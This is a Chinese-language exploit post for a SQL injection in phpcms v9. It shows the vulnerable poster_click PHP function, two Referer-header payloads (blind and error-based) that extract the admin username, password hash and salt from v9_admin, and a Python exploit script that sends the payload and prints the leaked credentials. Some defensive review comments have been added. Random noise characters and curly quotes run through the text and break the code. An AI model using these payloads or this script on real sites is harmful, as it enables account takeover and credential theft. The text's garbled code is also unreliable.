有人放出了phpcmsv9的0day,就随手写了个利用代码,其中注入代码有两种形式:
. x0 u9 x% F2 `, i3 z% B6 C9 I
问题函数 \phpcms\modules\poster\index.php
S1 A: M# u+ K
/**
 * Record a click on a "poster" (advert) row and redirect the visitor to its link.
 *
 * Security notes (review):
 *  - The insert() call stores 'referer' => HTTP_REFERER, i.e. a request header,
 *    straight into the click log. Per the write-up above this is the reported
 *    SQL injection: nothing in this function escapes that value, and whether
 *    $this->s_db->insert() does cannot be seen from here (TODO confirm).
 *    $username (read from a cookie) and $area (derived from the client IP)
 *    travel the same path. Mitigation: escape or bind every string value
 *    before it reaches the query, and do not return database error text to
 *    the client, since error-based extraction depends on seeing it.
 *  - When the poster has more than one setting entry, $_GET['url'] becomes the
 *    Location: target without any validation, so the endpoint can redirect to
 *    an arbitrary caller-supplied URL (open redirect). Restrict the target to
 *    the configured linkurl values or an allow-list.
 *
 * @return bool|void false when no poster row matches the id; otherwise a
 *                   Location header is sent and nothing is returned.
 */
public function poster_click() {
    // Only the id is normalised (intval); the other request-derived values below are not.
    $id = isset($_GET['id']) ? intval($_GET['id']) : 0;
    $r = $this->db->get_one(array('id'=>$id));
    // Unknown poster id: nothing to log and nothing to redirect to.
    if (!is_array($r) && empty($r)) return false;
    // ip_area / ip() are framework helpers; their output is treated as trusted here — TODO confirm.
    $ip_area = pc_base::load_sys_class('ip_area');
    $ip = ip();
    $area = $ip_area->get($ip);
    // Client-controlled: whatever the 'username' cookie holds, or '' when absent.
    $username = param::get_cookie('username') ? param::get_cookie('username') : '';
    if($id) {
        $siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
        // Click-log row. HTTP_REFERER (presumably $_SERVER['HTTP_REFERER']) and
        // $username originate from the client request and are passed as-is.
        $this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
    }
    // '+=1' looks like the project's increment convention for update() — TODO confirm.
    $this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
    // string2array() is a framework helper; assumed to unserialise the stored setting — confirm.
    $setting = string2array($r['setting']);
    // A single configured link is used unconditionally; otherwise a caller-supplied ?url= wins.
    if (count($setting)==1) {
        $url = $setting['1']['linkurl'];
    } else {
        $url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
    }
    // Unvalidated redirect target (see Security notes above). The function returns
    // normally after sending the header; whether anything runs afterwards depends on the caller.
    header('Location: '.$url);
}
; J5 R' \4 I s3 R% ]/ C. r1 B" y* _) d; R+ O: g
& O# V& V; K+ b' y [
6 J. H9 w. f: @& D, l
利用方式:
$ D' \5 P1 Z6 T: J. b
1、可以采用盲注入的手法:
/ L! G# k- H/ G+ I
' h/ |" T" i& @1 [/ lreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#& p3 X" S3 l3 J; E- D3 {% t
' X" [/ I' s! h) y# h
通过返回页面正常与否,一个个猜解密码字段。
0 n5 I8 ?: m' m( G. P7 @- e# m
2、代码是花开写的,随手附上了:
3 g. m, ?( v6 A: j3 _1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#4 B5 u s; W' Y8 ? c. o- o& }
& ?3 Z) |' \, ^. ^ c% l$ w
此方法是爆错注入手法,原理自查。
; n# \5 u0 e% |- m
& B% q' E) [9 y5 o Y
利用程序:
8 S7 p. V& x) D# f1 L$ w
/ N; V# j$ t/ m: `#!/usr/bin/env python
3 p4 k, Y! b4 y4 Bimport httplib,sys,re4 e" I0 Q( g t8 s% G" b
. T3 l' \2 j6 y; K
def attack():2 ?* W+ _: P8 Z" F& I
    """Send one GET carrying the error-based payload and print what the server echoed back.

    Reviewer notes (defensive reading):
      - The only signal this needs is MySQL "Duplicate entry" error text in the
        response body (see the re.findall below). A server that does not return
        database error messages to clients gives it nothing to print, so
        suppressing verbose DB errors removes the extraction channel even before
        the injection itself is fixed.
      - Detection: a GET to index.php?m=poster&c=index&a=poster_click whose
        Referer header contains SQL (SELECT ... information_schema ...); web
        server and WAF logs can match on either the path or the header.
    """
print “Code by Pax.Mac Team conqu3r!”5 m! w" g& M$ m' N( j# @$ l0 [
print “Welcome to our zone!!!”
# argv[1] is the host, argv[2] the base path under which index.php lives.
2 j+ |- r6 m4 @4 w% q9 p7 w7 w, turl=sys.argv[1]
5 W6 ^! C" |2 K) b& q0 F' y! l+ _paths=sys.argv[2]
" [; N! M/ g4 [7 O* W* h" p* n0 Uconn = httplib.HTTPConnection(url)
# The Referer value is the injection carrier; everything else in the headers is cosmetic.
! i6 t6 A4 P3 T1 q+ |i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,6 R' J0 V) Z0 E! m. }5 j( x( O
“Accept”: “text/plain”,
! |" m) r6 ?, p8 s% Z“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
+ v b$ b9 o0 `6 ]" @2 w- n, yconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers), Q9 [9 B6 u2 D/ |8 B
r1 = conn.getresponse()6 t ]* g$ R& O! F% n
datas=r1.read()+ b0 U6 y5 u" u: z3 [
# Only a leaked MySQL error message satisfies this pattern; datas[0] raises IndexError when none matched.
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
f5 ^- X3 C5 nprint datas[0]
# O9 }$ z/ V! C8 k# T/ g- J, ^conn.close()/ p" w% _* s' _ u# q4 Q; Y/ }5 o, H
# Entry point: expects a host and a base path on the command line (argv[1], argv[2]);
# prints usage and exits with status 1 when fewer than two arguments were given.
if __name__==”__main__”:
4 u0 K; D+ ^$ L+ b* Qif len(sys.argv)<3:: Q8 g% x$ r1 [) o, a) g3 g6 Z
print “Code by Pax.Mac Team conqu3r”, ~$ Y1 u" J, A
print “Usgae:”: Q: w1 \/ b) O' ?
print “ phpcmsattack.py www.paxmac.org /”0 I) Q/ C! |0 m+ l' k& M
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
: {! `' c/ G5 F! M3 Esys.exit(1)
?9 W4 x: ?% u4 M" W7 c# Kattack()
( s9 Z# i/ t) ?2 h# i$ z! W
! @( l( M8 j) {# Y9 S4 Q6 N6 Y |